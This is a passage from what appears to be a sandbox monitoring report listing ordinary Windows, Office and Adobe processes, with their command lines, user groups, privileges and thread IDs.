"32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:00010c40" [0xc000000f], "LOCAL" [0x7] Thread: id = 443 os_tid = 0x448 Thread: id = 444 os_tid = 0x44c Thread: id = 446 os_tid = 0x454 Thread: id = 447 os_tid = 0x458 Thread: id = 448 os_tid = 0x45c Thread: id = 449 os_tid = 0x460 Thread: id = 453 os_tid = 0x470 Thread: id = 454 os_tid = 0x474 Thread: id = 455 os_tid = 0x478 Thread: id = 456 os_tid = 0x47c Thread: id = 457 os_tid = 0x480 Thread: id = 492 os_tid = 0x518 Thread: id = 565 os_tid = 0x654 Thread: id = 570 os_tid = 0x66c Thread: id = 572 os_tid = 0x674 Thread: id = 575 os_tid = 0x684 Thread: id = 576 os_tid = 0x688 Thread: id = 584 os_tid = 0x6a8 Thread: id = 585 os_tid = 0x6ac Thread: id = 586 os_tid = 0x6b0 Thread: id = 587 os_tid = 0x6b4 Thread: id = 588 os_tid = 0x6b8 Thread: id = 589 os_tid = 0x6bc Thread: id = 621 os_tid = 0x680 Thread: id = 647 os_tid = 0x7a0 Process: id = "48" image_name = "bcssync.exe" filename = "c:\\program files\\microsoft office\\office14\\bcssync.exe" page_root = "0x7aeec000" os_pid = "0x4c4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "45" os_parent_pid = "0x29c" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe\" /DelayServices" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e70d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 476 os_tid = 0x4c8 Process: id = "49" image_name = "runonce.exe" filename = "c:\\windows\\syswow64\\runonce.exe" page_root = "0x7a5e1000" os_pid = "0x4cc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "45" os_parent_pid = "0x29c" cmd_line = "C:\\Windows\\SysWOW64\\runonce.exe /Run6432" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e70d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 477 os_tid = 0x4d0 Thread: id = 483 os_tid = 0x4e8 Thread: id = 484 os_tid = 0x4f0 Thread: id = 488 os_tid = 0x508 Thread: id = 516 os_tid = 0x584 Process: id = "50" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x7c14b000" os_pid = "0x50c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x1b0" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:0001568e" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 489 os_tid = 0x510 Thread: id = 494 os_tid = 0x524 Thread: id = 496 os_tid = 0x530 Thread: id = 497 os_tid = 0x534 Thread: id = 502 os_tid = 0x54c Thread: id = 510 os_tid = 0x570 Process: id = "51" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x74da7000" os_pid = "0x528" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0x23c" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e70d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 495 os_tid = 0x52c Thread: id = 499 os_tid = 0x540 Thread: id = 504 os_tid = 0x554 Thread: id = 506 os_tid = 0x560 Thread: id = 507 os_tid = 0x564 Thread: id = 508 os_tid = 0x568 Thread: id = 514 os_tid = 0x580 Process: id = "52" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x75db5000" os_pid = "0x558" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x1b0" cmd_line = "\"taskhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e70d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 505 os_tid = 0x55c Thread: id = 509 os_tid = 0x56c Thread: id = 512 os_tid = 0x57c Thread: id = 519 os_tid = 0x598 Thread: id = 521 os_tid = 0x5a4 Thread: id = 522 os_tid = 0x5a8 Thread: id = 531 os_tid = 0x5cc Thread: id = 536 os_tid = 0x5e0 Thread: id = 550 os_tid = 0x618 Thread: id = 558 os_tid = 0x638 Thread: id = 562 os_tid = 0x648 Thread: id = 573 os_tid = 0x678 Thread: id = 596 os_tid = 0x6dc Thread: id = 678 os_tid = 0x410 Thread: id = 679 os_tid = 0x204 Process: id = "53" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x77384000" os_pid = "0x574" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x1b0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00017cf3" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Thread: id = 511 os_tid = 0x578 Thread: id = 517 os_tid = 0x588 Thread: id = 524 os_tid = 0x5b0 Thread: id = 527 os_tid = 0x5bc Thread: id = 528 os_tid = 0x5c0 Thread: id = 532 os_tid = 0x5d0 Thread: id = 543 os_tid = 0x5fc Thread: id = 557 os_tid = 0x634 Thread: id = 559 os_tid = 0x63c Thread: id = 560 os_tid = 0x640 Thread: id = 563 os_tid = 0x64c Thread: id = 564 os_tid = 0x650 Thread: id = 566 os_tid = 0x658 Thread: id = 574 os_tid = 0x67c Thread: id = 577 os_tid = 0x68c Thread: id = 578 os_tid = 0x690 Thread: id = 579 os_tid = 0x694 Thread: id = 582 os_tid = 0x6a0 Thread: id = 626 os_tid = 0x744 Thread: id = 630 os_tid = 0x754 Thread: id = 637 os_tid = 0x778 Thread: id = 638 os_tid = 0x77c Thread: id = 640 os_tid = 0x784 Thread: id = 641 os_tid = 0x788 Thread: id = 657 os_tid = 0x7c4 Thread: id = 658 os_tid = 0x7c8 Thread: id = 660 os_tid = 0x7d0 Thread: id = 661 os_tid = 0x7d4 Process: id = "54" image_name = "reader_sl.exe" filename = "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\reader_sl.exe" page_root = "0x75bb6000" os_pid = "0x590" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x4cc" cmd_line = "\"C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\reader_sl.exe\" " cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e70d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 518 os_tid = 0x594 Thread: id = 529 os_tid = 0x5c4 Thread: id = 551 os_tid = 0x61c Process: id = "55" image_name = "adobearm.exe" filename = "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobearm.exe" page_root = "0x75ed5000" os_pid = "0x59c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x4cc" cmd_line = "\"C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\" " cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e70d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 520 os_tid = 0x5a0 Thread: id = 542 os_tid = 0x5f8 Thread: id = 544 os_tid = 0x600 Process: id = "56" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0x71867000" os_pid = "0x760" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x1b0" cmd_line = "taskhost.exe SYSTEM" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 665 os_tid = 0x764 Thread: id = 676 os_tid = 0x428 Thread: id = 677 os_tid = 0x438 Thread: id = 680 os_tid = 0x47c Thread: id = 681 os_tid = 0x45c Thread: id = 682 os_tid = 0x494 Thread: id = 683 os_tid = 0x49c